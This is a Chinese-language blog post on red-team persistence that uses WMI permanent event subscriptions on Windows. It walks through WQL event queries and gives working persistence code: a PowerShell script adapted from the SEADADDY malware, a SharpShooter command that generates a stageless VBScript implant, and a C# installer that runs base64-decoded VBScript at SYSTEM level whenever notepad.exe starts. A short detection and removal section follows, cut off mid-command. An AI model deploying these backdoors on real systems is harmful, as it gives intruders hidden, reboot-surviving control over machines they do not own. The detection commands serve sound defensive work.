<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">



<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  
    
      
    

    
  

  

  
    
      
    

    
  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Monda:300,300italic,400,400italic,700,700italic|sans-serif:300,300italic,400,400italic,700,700italic|Lato:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css">


  <meta name="keywords" content="内网渗透,权限维持,">





  <link rel="alternate" href="/atom.xml" title="RcoIl的窝" type="application/atom+xml">




  <link rel="shortcut icon" type="image/x-icon" href="/images/favicon.png?v=5.1.0">






<meta name="description" content="本文是针对Windows常见持久控制的第三次说明。 与之前的文章不同，这个操作需要管理员权限。">
<meta name="keywords" content="内网渗透,权限维持">
<meta property="og:type" content="article">
<meta property="og:title" content="永久性 WMIC 事件订阅 - 权限维持（三）">
<meta property="og:url" content="https://rcoil.me/2019/05/永久性 WMIC 事件订阅 - 权限维持（三）/index.html">
<meta property="og:site_name" content="RcoIl的窝">
<meta property="og:description" content="本文是针对Windows常见持久控制的第三次说明。 与之前的文章不同，这个操作需要管理员权限。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://rcoil.me/image/永久性%20WMIC%20事件订阅%20-%20权限维持（三）/blog_2019-05-30_11-42-33.png">
<meta property="og:image" content="https://rcoil.me/image/永久性%20WMIC%20事件订阅%20-%20权限维持（三）/blog_2019-05-29_11-42-33.gif">
<meta property="og:updated_time" content="2019-05-31T08:16:16.781Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="永久性 WMIC 事件订阅 - 权限维持（三）">
<meta name="twitter:description" content="本文是针对Windows常见持久控制的第三次说明。 与之前的文章不同，这个操作需要管理员权限。">
<meta name="twitter:image" content="https://rcoil.me/image/永久性%20WMIC%20事件订阅%20-%20权限维持（三）/blog_2019-05-30_11-42-33.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"always","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '6230266985318450000',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://rcoil.me/2019/05/永久性 WMIC 事件订阅 - 权限维持（三）/">





  <title> 永久性 WMIC 事件订阅 - 权限维持（三） | RcoIl的窝 </title>
</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?ce3d1967864bac5f69f1c1a6042e5577";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>










  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">RcoIl的窝</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-count">
          <a href="/count" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-fa fa-free-code-camp"></i> <br>
            
            阅读榜
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocapitalize="off" autocomplete="off" autocorrect="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope="" itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="https://rcoil.me/2019/05/永久性 WMIC 事件订阅 - 权限维持（三）/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="RcoIl">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="RcoIl的窝">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                永久性 WMIC 事件订阅 - 权限维持（三）
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-05-30T20:52:59+08:00">
                2019-05-30
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing">
                  <a href="/categories/内网渗透/" itemprop="url" rel="index">
                    <span itemprop="name">内网渗透</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/2019/05/永久性 WMIC 事件订阅 - 权限维持（三）/" class="leancloud_visitors" data-flag-title="永久性 WMIC 事件订阅 - 权限维持（三）">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                <!--
				<i class="fa fa-eye"></i>
				-->
				<i class="fa fa-thermometer-three-quarters" aria-hidden="true"></i>
               </span>
               
                 <span class="post-meta-item-text">热度 </span>
               
                 <span class="leancloud-visitors-count"></span>
				 <span>℃</span>
             </span>
          

          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>本文是针对<a href="https://github.com/RcoIl/Mind-Map/blob/master/Windows%E5%B8%B8%E8%A7%81%E6%8C%81%E4%B9%85%E6%8E%A7%E5%88%B6.png" target="_blank" rel="noopener">Windows常见持久控制</a>的第三次说明。</p>
<p>与之前的文章不同，这个操作需要管理员权限。</p>
<a id="more"></a>
<h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h2><p>在日常中，使用 <code>WMI</code> 都是用于信息的收集，如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">wmic qfe list #获取补丁信息</span><br><span class="line">wmic startup list brief # 启动的程序</span><br><span class="line">wmic startup list full # 自启动的程序</span><br><span class="line">wmic process call create &quot;calc.exe&quot; # 在当前机器中执行指定程序</span><br><span class="line">wmic process where name=&apos;*.exe&apos; list full   #查询某个进程所对应某个具体的可执行程序是什么</span><br><span class="line">wmic process where(description=&quot;rundll32.exe&quot;) # 查看rundll32所加载的dll</span><br><span class="line">wmic cpu get DataWidth /format:list # 查询当前机器的操作系统位数</span><br><span class="line">wmic share  get name,path,status  #利用wmic查找共享</span><br><span class="line">wmic logicaldisk where drivetype=3 get name,freespace,systemname,filesystem,volumeserialnumber,size #查看分区</span><br></pre></td></tr></table></figure>
<p>但其实它的功能还有很多，比如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">防病毒检测</span><br><span class="line">代码执行</span><br><span class="line">横向移动</span><br><span class="line">持久化</span><br><span class="line">盗取数据</span><br></pre></td></tr></table></figure>
<p>这里就针对持久化进行说明 。</p>
<h2 id="0x01-查询-WMI"><a href="#0x01-查询-WMI" class="headerlink" title="0x01 查询 WMI"></a>0x01 查询 WMI</h2><p><code>WMI</code> 提供了一种非常直观的语法用来查询WMI对象的实例，类和命名空间，即 <code>WQL</code> （类似 SQL的查询语言）。WQL查询通常可以分为以下几类：</p>
<ul>
<li>Instance Queries（实例查询）：查询WMI对象实例。</li>
<li>Event Queries（事件查询）：等同于在WMI对象创建/修改/删除的时候注册一个消息。</li>
<li>Meta Queries（元查询）：元查询用来获取WMI命名空间和类结构的元信息。</li>
</ul>
<h3 id="1-1-Instance-Queries"><a href="#1-1-Instance-Queries" class="headerlink" title="1.1 Instance Queries"></a>1.1 Instance Queries</h3><p>这是最常用的WQL查询。基本的格式如下：<br><code>SELECT [Class property name | *] FROM [CLASS NAME] &lt;WHERE [CONSTRAINT]&gt;</code></p>
<ul>
<li>下面的查询语句将返回所有可执行文件名中带有 <code>chrome</code> 的正在运行的进程：<br><code>SELECT * FROM Win32_Process WHERE Name LIKE &quot;%chrome%&quot;</code></li>
</ul>
<h3 id="1-2-Event-Queries"><a href="#1-2-Event-Queries" class="headerlink" title="1.2 Event Queries"></a>1.2 Event Queries</h3><p>事件查询被用作一种消息机制来监听事件类的触发。通常用来在一个WMI对象实例创建/修改/删除的时候给用户发送一个消息。根据消息类型是 <code>intrinsic</code>（系统自带的）还是 <code>extrinsic</code>（第三方的），查询语句格式不同：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">SELECT [Class property name | *] FROM [INTRINSIC CLASS NAME] WITHIN [POLLING INTERVAL] &lt;WHERE [CONSTRAINT]&gt;</span><br><span class="line"></span><br><span class="line">SELECT [Class property name | *] FROM [EXTRINSIC CLASS NAME] &lt;WHERE [CONSTRAINT]&gt;</span><br></pre></td></tr></table></figure>
<ul>
<li><p>用于登陆时都会触发此事件：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM __InstanceCreationEvent WITHIN 15 WHERE TargetInstanceISA &apos;Win32_LogonSession&apos; AND TargetInstance.LogonType=2</span><br></pre></td></tr></table></figure>
</li>
<li><p>每次用户在插入可移除设备时都会触发此事件：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM Win32_VolumeChangeEvent Where EventType=2</span><br></pre></td></tr></table></figure>
</li>
<li><p>每次创建 win32 进程时都会触发此事件：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Select * From __InstanceCreationEvent Where TargetInstance Isa &quot;Win32_Process&quot;</span><br></pre></td></tr></table></figure>
</li>
</ul>
<h3 id="1-3-Meta-Queries"><a href="#1-3-Meta-Queries" class="headerlink" title="1.3 Meta Queries"></a>1.3 Meta Queries</h3><p>元查询用来查询WMI命名空间和类结构的信息。最常见的用法是用来列举WMI命名空间的类结构。元查询是实例查询的一个子集，但是与对象查询不同的是，我们查询的是类的实例的定义。</p>
<ul>
<li><p>格式如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT [Class property name | *] FROM [Meta_Class | SYSTEM CLASS NAME] &lt;WHERE [CONSTRAINT]&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p>下面这个语句会查询所有以 <code>WIN32</code> 开头的WMI的类：<br><code>SELECT * FROM Meta_Class WHERE __CLASS LIKE &quot;Win32%&quot;</code></p>
</li>
<li>下面这个语句会查询某个命名空间下的所有命名空间：<br><code>SELECT Name FROM __NAMESPACE</code></li>
</ul>
<p>注意，当不显示的指定命名空间时，默认的命名空间为<code>ROOT\CIMV2</code>。</p>
<h2 id="0x02-与WMI交互"><a href="#0x02-与WMI交互" class="headerlink" title="0x02 与WMI交互"></a>0x02 与WMI交互</h2><p>Microsoft和一些第三方软件开发者为我们提供了许多能够与WMI交互的工具。</p>
<p>下面是部分工具的一个不完全的列表</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">1、PowerShell</span><br><span class="line">2、wmic.exe</span><br><span class="line">3、wbemtest.exe</span><br><span class="line">4、WMI Explorer</span><br><span class="line">5、CIM Studio</span><br><span class="line">6、Windows Script Host (WSH) languages</span><br><span class="line">7、C/C++ via IWbem* COM API</span><br><span class="line">8、.NET using System.Management classes</span><br><span class="line">9、winrm.exe</span><br></pre></td></tr></table></figure>
<h2 id="0x03-WMI事件"><a href="#0x03-WMI事件" class="headerlink" title="0x03 WMI事件"></a>0x03 WMI事件</h2><p>WMI事件分两类，包括<code>本地事件</code>（运行在本地上下文环境当中的单个进程的事件）和<code>永久性WMI事件订阅</code>。</p>
<p>本地事件有生命周期为进程宿主的周期，而永久性 WMI事件 是存储在WMI库中，以 SYSTEM 权限运行，并且重启后依然存在。</p>
<h3 id="3-1-前置条件"><a href="#3-1-前置条件" class="headerlink" title="3.1 前置条件"></a>3.1 前置条件</h3><p>为了能够安装一个<code>永久性的 WMI 事件订阅</code>，必须满足两个条件：</p>
<ul>
<li>一个 <code>__EventFilter</code> 查询，它创建一个过滤器，为我们的特定事件选择触发器;</li>
<li><a href="https://docs.microsoft.com/en-gb/windows/desktop/WmiSdk/standard-consumer-classes" target="_blank" rel="noopener">Event Consumer Class</a>，代表一个事件触发时所执行的操作。</li>
</ul>
<p>在 <code>Event Consumers</code>（事件处理）中，可用的标准事件处理类：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">LogFileEventConsumer： 将事件数据写入到指定的日志文件</span><br><span class="line">ActiveScriptEventConsumer： 用来执行VBScript/JScript程序</span><br><span class="line">NTEventLogEventConsumer：创建一个包含事件数据的日志入口点</span><br><span class="line">SMTPEventConsumer：将事件数据用邮件发送</span><br><span class="line">CommandLineEventConsumer：执行一条命令</span><br></pre></td></tr></table></figure></p>
<p>利用点</p>
<ul>
<li><code>ActiveScriptEventConsumer</code>，允许执行任意脚本（支持 <code>JScript</code> 和 <code>VBScript</code> 引擎）</li>
<li><code>CommandLineEventConsumer</code>，允许执行任意命令</li>
</ul>
<h3 id="3-2-测试"><a href="#3-2-测试" class="headerlink" title="3.2 测试"></a>3.2 测试</h3><p>使用以下查询进行测试：</p>
<p><code>Select * From __InstanceCreationEvent Where TargetInstance Isa &quot;Win32_Process&quot;</code></p>
<p>为了方便测试，此处使用 <code>Powershell 的 Register-WMIEvent</code> 安装触发器。</p>
<p><img src="/image/永久性 WMIC 事件订阅 - 权限维持（三）/blog_2019-05-30_11-42-33.png" alt="blog_2019-05-30_11-42-33"></p>
<p>以上测试不符合实际需求。</p>
<h3 id="3-3-Powershell-实例（命令执行）"><a href="#3-3-Powershell-实例（命令执行）" class="headerlink" title="3.3 Powershell 实例（命令执行）"></a>3.3 Powershell 实例（命令执行）</h3><p>下面的 <code>PowerShell</code> 代码来自一个叫 <code>SEADADDY</code> 的恶意软件的修改版，用来通过<code>WMI做持久化</code>的</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$EventFilterName</span> = <span class="string">'BotFilter11'</span></span><br><span class="line"><span class="variable">$EventConsumerName</span> = <span class="string">'BotConsumer22'</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$EventFilterArgs</span> = @&#123;</span><br><span class="line">		EventNamespace = <span class="string">'root\cimv2'</span></span><br><span class="line">		Name = <span class="variable">$EventFilterName</span></span><br><span class="line">		Query = <span class="string">'Select * From __InstanceCreationEvent Where TargetInstance Isa "Win32_Process"'</span></span><br><span class="line">		QueryLanguage=<span class="string">"WQL"</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$WMIEventFilter</span> = <span class="built_in">Set-WmiInstance</span> -NameSpace <span class="string">'root\subscription'</span> -Class __EventFilter -Arguments <span class="variable">$EventFilterArgs</span> -ErrorAction Stop</span><br><span class="line"></span><br><span class="line"><span class="variable">$CommandLineumerArgs</span> =@&#123;</span><br><span class="line">        Name=<span class="variable">$EventConsumerName</span></span><br><span class="line">		CommandLineTemplate=<span class="string">'C:\Windows\System32\calc.exe'</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$WMIEventConsumer</span> = <span class="built_in">Set-WmiInstance</span> -Namespace <span class="string">'root\subscription'</span> -Class CommandLineEventConsumer -Arguments <span class="variable">$CommandLineumerArgs</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$WMIEventFilterToConsumerArgs</span> = @&#123;</span><br><span class="line">		<span class="keyword">Filter</span>=<span class="variable">$WMIEventFilter</span></span><br><span class="line">		Consumer=<span class="variable">$WMIEventConsumer</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="built_in">Set-WmiInstance</span> -Namespace <span class="string">'root\subscription'</span> -Class __FilterToConsumerBinding -Arguments <span class="variable">$WMIEventFilterToConsumerArgs</span></span><br></pre></td></tr></table></figure>
<p>但是这里实测失败，就算使用<code>C#</code>去添加 <code>CommandLineEventConsumer</code> 也是失败的，但是 <code>LogFileEventConsumer</code> 可成功。</p>
<h3 id="3-4-C-实例（代码执行）"><a href="#3-4-C-实例（代码执行）" class="headerlink" title="3.4 C# 实例（代码执行）"></a>3.4 C# 实例（代码执行）</h3><p>本示例执行的是 <code>VBScript</code></p>
<p>使用<code>SharpShooter</code>生成 <code>VBSceipt</code> 类型的 <code>payload</code>。<em>友情提示：一定要生成 64位的 payload。</em></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&gt; python SharpShooter.py --stageless --dotnetver 2 --payload vbs --output implantvbs --rawscfile payload64.bin</span><br><span class="line"></span><br><span class="line">       _____ __                    _____ __                __           </span><br><span class="line">      / ___// /_  ____ __________ / ___// /_  ____  ____  / /____  _____</span><br><span class="line">      \__ \/ __ \/ __ `/ ___/ __ \__ \/ __ \/ __ \/ __ \/ __/ _ \/ ___/</span><br><span class="line">     ___/ / / / / /_/ / /  / /_/ /__/ / / / / /_/ / /_/ / /_/  __/ /    </span><br><span class="line">    /____/_/ /_/\__,_/_/  / .___/____/_/ /_/\____/\____/\__/\___/_/     </span><br><span class="line">                         /_/                                            </span><br><span class="line"></span><br><span class="line">     Dominic Chell, @domchell, MDSec ActiveBreach, v2.0</span><br><span class="line">    </span><br><span class="line">[*] Written delivery payload to output/implantvbs.vbs</span><br><span class="line">运行vbs，成功上线，再进行 base64 编码</span><br><span class="line">&gt; base64 -i output/implantvbs.vbs &gt;&gt;implantvbs-base64.txt</span><br></pre></td></tr></table></figure>
<p>示例代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br></pre></td><td class="code"><pre><span class="line">// WMI Event Subscription Peristence Demo</span><br><span class="line">// Author: @domchell</span><br><span class="line"></span><br><span class="line">using System;</span><br><span class="line">using System.Text;</span><br><span class="line">using System.Management;</span><br><span class="line"></span><br><span class="line">namespace WMIPersistence</span><br><span class="line">&#123;</span><br><span class="line">    class Program</span><br><span class="line">    &#123;</span><br><span class="line">        static void Main(string[] args)</span><br><span class="line">        &#123;</span><br><span class="line">            PersistWMI();</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        static void PersistWMI()</span><br><span class="line">        &#123;</span><br><span class="line">            ManagementObject myEventFilter = null;</span><br><span class="line">            ManagementObject myEventConsumer = null;</span><br><span class="line">            ManagementObject myBinder = null;</span><br><span class="line"></span><br><span class="line">            string vbscript64 = &quot;&lt;INSIDE base64 encoded VBS here&gt;&quot;;</span><br><span class="line">            string vbscript = Encoding.UTF8.GetString(Convert.FromBase64String(vbscript64));</span><br><span class="line">            try</span><br><span class="line">            &#123;</span><br><span class="line">                ManagementScope scope = new ManagementScope(@&quot;\\.\root\subscription&quot;);</span><br><span class="line"></span><br><span class="line">                ManagementClass wmiEventFilter = new ManagementClass(scope, new</span><br><span class="line">                ManagementPath(&quot;__EventFilter&quot;), null);</span><br><span class="line">                String strQuery = @&quot;SELECT * FROM __InstanceCreationEvent WITHIN 5 &quot; +            </span><br><span class="line">        &quot;WHERE TargetInstance ISA \&quot;Win32_Process\&quot; &quot; +           </span><br><span class="line">        &quot;AND TargetInstance.Name = \&quot;notepad.exe\&quot;&quot;;</span><br><span class="line"></span><br><span class="line">                WqlEventQuery myEventQuery = new WqlEventQuery(strQuery);</span><br><span class="line">                myEventFilter = wmiEventFilter.CreateInstance();</span><br><span class="line">                myEventFilter[&quot;Name&quot;] = &quot;demoEventFilter&quot;;</span><br><span class="line">                myEventFilter[&quot;Query&quot;] = myEventQuery.QueryString;</span><br><span class="line">                myEventFilter[&quot;QueryLanguage&quot;] = myEventQuery.QueryLanguage;</span><br><span class="line">                myEventFilter[&quot;EventNameSpace&quot;] = @&quot;\root\cimv2&quot;;</span><br><span class="line">                myEventFilter.Put();</span><br><span class="line">                Console.WriteLine(&quot;[*] Event filter created.&quot;);</span><br><span class="line"></span><br><span class="line">                myEventConsumer =</span><br><span class="line">                new ManagementClass(scope, new ManagementPath(&quot;ActiveScriptEventConsumer&quot;),</span><br><span class="line">                null).CreateInstance();</span><br><span class="line">                myEventConsumer[&quot;Name&quot;] = &quot;BadActiveScriptEventConsumer&quot;;</span><br><span class="line">                myEventConsumer[&quot;ScriptingEngine&quot;] = &quot;VBScript&quot;;</span><br><span class="line">                myEventConsumer[&quot;ScriptText&quot;] = vbscript;</span><br><span class="line">                myEventConsumer.Put();</span><br><span class="line"></span><br><span class="line">                Console.WriteLine(&quot;[*] Event consumer created.&quot;);</span><br><span class="line"></span><br><span class="line">                myBinder =</span><br><span class="line">                new ManagementClass(scope, new ManagementPath(&quot;__FilterToConsumerBinding&quot;),</span><br><span class="line">                null).CreateInstance();</span><br><span class="line">                myBinder[&quot;Filter&quot;] = myEventFilter.Path.RelativePath;</span><br><span class="line">                myBinder[&quot;Consumer&quot;] = myEventConsumer.Path.RelativePath;</span><br><span class="line">                myBinder.Put();</span><br><span class="line"></span><br><span class="line">                Console.WriteLine(&quot;[*] Subscription created&quot;);</span><br><span class="line">            &#125;</span><br><span class="line">            catch (Exception e)</span><br><span class="line">            &#123;</span><br><span class="line">                Console.WriteLine(e);</span><br><span class="line">            &#125; // END CATCH</span><br><span class="line">            Console.ReadKey();</span><br><span class="line">        &#125; // END FUNC</span><br><span class="line">    &#125; // END CLASS</span><br><span class="line">&#125; // END NAMESPACE</span><br></pre></td></tr></table></figure>
<p>管理员权限运行生成的exe，<strong>演示 GIF</strong></p>
<p><img src="/image/永久性 WMIC 事件订阅 - 权限维持（三）/blog_2019-05-29_11-42-33.gif" alt="blog_2019-05-29_11-42-33"></p>
<h2 id="0x04-WMI后门检测及清除"><a href="#0x04-WMI后门检测及清除" class="headerlink" title="0x04 WMI后门检测及清除"></a>0x04 WMI后门检测及清除</h2><h3 id="4-1-Sysmon日志"><a href="#4-1-Sysmon日志" class="headerlink" title="4.1 Sysmon日志"></a>4.1 Sysmon日志</h3><p>略….</p>
<h3 id="4-2-查看当前WMI-Event"><a href="#4-2-查看当前WMI-Event" class="headerlink" title="4.2 查看当前WMI Event"></a>4.2 查看当前WMI Event</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">#List Event Filters</span><br><span class="line">Get-WMIObject -Namespace root\Subscription -Class __EventFilter</span><br><span class="line"></span><br><span class="line">#List Event Consumers</span><br><span class="line">Get-WMIObject -Namespace root\Subscription -Class __EventConsumer</span><br><span class="line"></span><br><span class="line">#List Event Bindings</span><br><span class="line">Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding</span><br></pre></td></tr></table></figure>
<h3 id="4-3-清除后门"><a href="#4-3-清除后门" class="headerlink" title="4.3 清除后门"></a>4.3 清除后门</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">#Filter</span><br><span class="line">Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter &quot;Name=&apos;BotFilter82&apos;&quot; | Remove-WmiObject -Verbose</span><br><span class="line"></span><br><span class="line">#Consumer</span><br><span class="line">Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter &quot;Name=&apos;BotConsumer23&apos;&quot; | Remove-WmiObject -Verbose</span><br><span class="line"></span><br><span class="line">#Binding</span><br><span class="line">Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter &quot;__Path LIKE 